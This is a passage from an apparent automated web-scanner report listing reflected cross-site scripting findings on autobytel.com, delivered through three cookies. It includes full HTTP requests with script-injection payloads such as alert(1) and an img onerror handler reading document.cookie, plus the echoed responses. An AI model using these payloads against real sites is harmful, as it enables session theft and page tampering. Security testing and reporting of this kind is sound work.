The value 2f9c2d<img src=a onerror=alert(1)>7f9bbd4f348 cannot be converted to a number.
</h1>
...[SNIP]...

4.2049. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2510"%3balert(1)//bdab59c776c was submitted in the BDATALIST cookie. This input was echoed as c2510";alert(1)//bdab59c776c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4c2510"%3balert(1)//bdab59c776c; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:40:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:40:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:40:51 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:40:51 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75090

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4c2510";alert(1)//bdab59c776c";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48003FB1-A3C6-ED4C-22F1F263
...[SNIP]...

4.2050. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c9e2"%3balert(1)//ac77fd474aa was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 4c9e2";alert(1)//ac77fd474aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=4c9e2"%3balert(1)//ac77fd474aa; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:21:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:21:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:21:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:21:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75090

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "4c9e2";alert(1)//ac77fd474aa||";

           s.prop14 = "research|reviews|addctdstep1 : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||
...[SNIP]...

4.2051. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 1d4b6<img%20src%3da%20onerror%3dalert(1)>cd22f64f11e was submitted in the PV_CT cookie. This input was echoed as 1d4b6<img src=a onerror=alert(1)>cd22f64f11e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=21d4b6<img%20src%3da%20onerror%3dalert(1)>cd22f64f11e; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 82831
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:56:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:29 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:28 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 21d4b6<img src=a onerror=alert(1)>cd22f64f11e cannot be converted to a number.
</h1>
...[SNIP]...

4.2052. http://www.autobytel.com/content/research/article/index.cfm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cff9f"%3balert(1)//537a25459db was submitted in the BDATALIST cookie. This input was echoed as cff9f";alert(1)//537a25459db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4cff9f"%3balert(1)//537a25459db; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:25 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4cff9f";alert(1)//537a25459db";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "477D7168-AD70-1C3A-5872C03B
...[SNIP]...

4.2053. http://www.autobytel.com/content/research/article/index.cfm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ccd4"%3balert(1)//5bf50f7c259 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 3ccd4";alert(1)//5bf50f7c259 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=3ccd4"%3balert(1)//5bf50f7c259; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:35:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:19 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:19 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "3ccd4";alert(1)//5bf50f7c259||";

           s.prop14 = "research|article : Search Engine Optimization Project entry page";
           s.prop15 = "8893|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||sky|ban|
...[SNIP]...

4.2054. http://www.autobytel.com/content/research/article/index.cfm [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 5e58b<img%20src%3da%20onerror%3dalert(1)>c3ba64603ac was submitted in the PV_CT cookie. This input was echoed as 5e58b<img src=a onerror=alert(1)>c3ba64603ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=25e58b<img%20src%3da%20onerror%3dalert(1)>c3ba64603ac; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 50515
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:31:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:19 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:19 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:19 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 25e58b<img src=a onerror=alert(1)>c3ba64603ac cannot be converted to a number.
</h1>
...[SNIP]...

4.2055. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 605fd"%3balert(1)//420924e9679 was submitted in the BDATALIST cookie. This input was echoed as 605fd";alert(1)//420924e9679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4605fd"%3balert(1)//420924e9679; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:12 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:12 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4605fd";alert(1)//420924e9679";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "477B6AC8-0CB9-E79B-1D936E4D
...[SNIP]...

4.2056. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60be7"%3balert(1)//28645459fda was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 60be7";alert(1)//28645459fda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=60be7"%3balert(1)//28645459fda; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:30:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:30:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:30:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:30:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "60be7";alert(1)//28645459fda||";

           s.prop14 = "research|article|autoshow : Search Engine Optimization Project entry page";
           s.prop15 = "6582|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||
...[SNIP]...

4.2057. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 11748<img%20src%3da%20onerror%3dalert(1)>74f3489293b was submitted in the PV_CT cookie. This input was echoed as 11748<img src=a onerror=alert(1)>74f3489293b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=211748<img%20src%3da%20onerror%3dalert(1)>74f3489293b; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 60824
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:27:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:46 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:45 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:45 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 211748<img src=a onerror=alert(1)>74f3489293b cannot be converted to a number.
</h1>
...[SNIP]...

4.2058. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8fdd"%3balert(1)//5500969e7cb was submitted in the BDATALIST cookie. This input was echoed as e8fdd";alert(1)//5500969e7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
